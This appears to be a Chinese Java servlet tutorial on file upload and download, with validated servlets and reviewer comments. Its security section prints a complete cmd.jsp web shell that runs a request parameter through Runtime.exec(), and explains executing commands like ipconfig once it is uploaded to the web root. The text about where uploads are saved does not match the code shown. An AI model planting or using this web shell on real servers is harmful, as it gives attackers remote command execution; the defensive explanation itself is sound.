上传
upload.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<!-- Upload form: posts the two file fields "file" and "file2" as one multipart request to the relative URL "upload". -->
<form action="upload" method="post" enctype="multipart/form-data">
<!-- enctype="multipart/form-data" is required to upload binary data; application/x-www-form-urlencoded only carries text fields -->
<input type="file" name="file"/>
<input type="file" name="file2">
<input type="submit" value="submit">
</form>
</body>
</html>
UploadServlet.java
package servlet;
import javax.servlet.ServletException;
import javax.servlet.annotation.MultipartConfig;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.Part;
import java.io.File;
import java.io.IOException;
import java.util.List;
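@WebServlet(name = "UploadServlet",urlPatterns = {"/upload"})
// @MultipartConfig switches on the Servlet 3.0 multipart support behind HttpServletRequest.getParts().
// NOTE(review): no maxFileSize / maxRequestSize is configured, so the accepted upload size is
// whatever the container defaults to; set explicit limits for a real deployment.
@MultipartConfig
public class UploadServlet extends HttpServlet {

    /**
     * Directory that receives uploaded files. It is deliberately outside the web application
     * root: a file stored under the web root is served by the container, and an uploaded
     * {@code .jsp} there would be compiled and executed. The value follows the location the
     * article itself suggests; adjust it per deployment.
     */
    private static final String UPLOAD_DIR = "c:" + File.separator;

    /**
     * Stores every uploaded file part of a multipart request in {@link #UPLOAD_DIR}.
     *
     * <p>The client-supplied file name is reduced to its last path component and validated, and
     * the resolved target must sit directly inside the upload directory; otherwise the request
     * is answered with 400 and nothing further is written.
     *
     * @param request  the multipart POST request
     * @param response the response; only used to report an invalid file name
     * @throws ServletException if the request is not a valid multipart request
     * @throws IOException      if reading a part or writing a file fails
     */
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        request.setCharacterEncoding("utf-8");
        response.setContentType("text/html;charset=utf-8");

        File uploadDir = new File(UPLOAD_DIR).getCanonicalFile();

        // Iterate the returned Collection directly; the servlet API does not promise a List,
        // so the original (List<Part>) cast could fail depending on the container.
        for (Part part : request.getParts()) {
            String submitted = part.getSubmittedFileName(); // file name as sent by the client
            if (submitted == null || submitted.isEmpty()) {
                continue; // ordinary form field, or a file input that was left empty
            }

            String safeName = baseName(submitted);
            if (!isAcceptableName(safeName)) {
                response.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid file name");
                return;
            }

            // Defence in depth: after canonicalisation the target must still be a direct
            // child of the upload directory.
            File target = new File(uploadDir, safeName).getCanonicalFile();
            if (!uploadDir.equals(target.getParentFile())) {
                response.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid file name");
                return;
            }

            System.out.println(part.getName());
            System.out.println(part.getSize());
            System.out.println(safeName);
            System.out.println(uploadDir);

            // NOTE(review): an existing file with the same name is overwritten, and no file-type
            // allowlist is applied; consider server-generated names and an extension allowlist.
            part.write(target.getPath());
        }
    }

    /** Handles GET exactly like POST. */
    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doPost(request,response);
    }

    /** Returns the text after the last '/' or '\' so that any directory part sent by the client is dropped. */
    private static String baseName(String submitted) {
        int cut = Math.max(submitted.lastIndexOf('/'), submitted.lastIndexOf('\\'));
        return submitted.substring(cut + 1);
    }

    /** Rejects empty names, the special names "." and "..", drive/stream separators and control characters. */
    private static boolean isAcceptableName(String name) {
        if (name.isEmpty() || ".".equals(name) || "..".equals(name)) {
            return false;
        }
        for (int i = 0; i < name.length(); i++) {
            char c = name.charAt(i);
            if (c < 0x20 || c == 0x7f || c == ':') {
                return false;
            }
        }
        return true;
    }
}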
安全问题
上面的代码把上传的文件直接保存在 Web 应用的根目录下,并且不检查文件名和文件类型,所以上传一个 jsp 文件也能成功。该目录下的 jsp 会被容器当作页面编译执行,因此下面这个 cmd.jsp 就可以造成很大的破坏
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
// Reviewer note: this page is shown as an example of what an unrestricted upload into the
// web root exposes. It has no authentication and hands a request parameter to
// Runtime.exec(), so the command runs with the privileges of the servlet container process.
// Defensive takeaways: keep uploads outside any directory the container serves or compiles,
// validate file names and types on upload, and alert on .jsp files appearing in upload
// locations and on the container process spawning child processes.
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="cmd.jsp">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
// Runs only when the request carries a "cmd" parameter.
if (request.getParameter("cmd") != null) {
// The parameter is echoed into the page without HTML escaping.
out.println("Command: " + request.getParameter("cmd") + "<BR>");
// The request-controlled string is passed unchanged to Runtime.exec().
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
// The process's standard output is copied line by line into the HTTP response.
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
具体来说,在浏览器中访问 localhost:8080/upload/cmd.jsp,然后在 form 表单中输入指令 ipconfig,就可以获得服务器的 ip 等信息。
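所以,上传文件时保存路径要改,例如 part.write("c:"+ File.separator+part.getSubmittedFileName());,直接将文件保存在 c: 盘,这样上传的 jsp 不在 Web 目录下,就不会被容器执行。当然,具体路径,你自便。
注意:getSubmittedFileName() 的值由客户端提供,可能带有路径分隔符或 ..,保存前应只取文件名部分并做校验,否则文件仍可能被写到目标目录之外。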
下载
download.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<!-- Link to the relative URL "download"; the file to fetch is named in the fileName query parameter. -->
<a href="download?fileName=gakki.jpg">gakki.jpg</a>
</body>
</html>
DownloadServlet
package servlet;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.OutputStream;
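@WebServlet(name = "DownloadServlet",urlPatterns = {"/download"})
public class DownloadServlet extends HttpServlet {

    /** Directory the downloadable files are read from (the location used by the original code). */
    private static final String DOWNLOAD_DIR = "c:" + File.separator;

    /**
     * Streams the file named by the {@code fileName} request parameter as an attachment.
     *
     * <p>{@code fileName} is untrusted input. It is accepted only when it is a plain file name
     * (no path separators, drive or stream separator, quotes or control characters) and when the
     * canonical target is a regular file directly inside {@link #DOWNLOAD_DIR}. Without these
     * checks the parameter could select any file readable under that drive and could corrupt
     * the Content-Disposition header.
     *
     * <p>NOTE(review): every file directly inside the directory can be fetched by anyone who can
     * reach this servlet and knows its name; add an authorization check if that is not intended.
     *
     * @param request  the request carrying the {@code fileName} parameter
     * @param response receives the file bytes, or 400 for an invalid name / 404 for a missing file
     * @throws ServletException declared by the servlet API; not thrown by this method itself
     * @throws IOException      if reading the file or writing the response fails
     */
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        request.setCharacterEncoding("utf-8");

        String fileName = request.getParameter("fileName");
        if (!isPlainFileName(fileName)) {
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid fileName");
            return;
        }

        // Resolve against the base directory and confirm the result did not leave it.
        File baseDir = new File(DOWNLOAD_DIR).getCanonicalFile();
        File target = new File(baseDir, fileName).getCanonicalFile();
        if (!baseDir.equals(target.getParentFile()) || !target.isFile()) {
            response.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }

        // A download is arbitrary bytes, not an HTML page; also tell the browser not to sniff it.
        response.setContentType("application/octet-stream");
        response.setHeader("X-Content-Type-Options", "nosniff");
        // The name is quoted so that spaces survive; quotes and control characters were rejected above.
        // Non-ASCII names would additionally need the RFC 6266 filename* form.
        response.setHeader("Content-Disposition", "attachment; filename=\"" + fileName + "\"");

        // try-with-resources closes the file even when the client aborts the transfer.
        try (FileInputStream fis = new FileInputStream(target)) {
            OutputStream os = response.getOutputStream();
            byte[] buf = new byte[1024];
            int read;
            while ((read = fis.read(buf)) != -1) {
                os.write(buf, 0, read);
            }
            os.flush();
        }
    }

    /** Handles GET exactly like POST. */
    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doPost(request,response);
    }

    /** Returns true only for a non-empty name without separators, ':' , '"' or control characters, other than "." and "..". */
    private static boolean isPlainFileName(String name) {
        if (name == null || name.isEmpty() || ".".equals(name) || "..".equals(name)) {
            return false;
        }
        for (int i = 0; i < name.length(); i++) {
            char c = name.charAt(i);
            if (c < 0x20 || c == 0x7f || c == '/' || c == '\\' || c == ':' || c == '"') {
                return false;
            }
        }
        return true;
    }
}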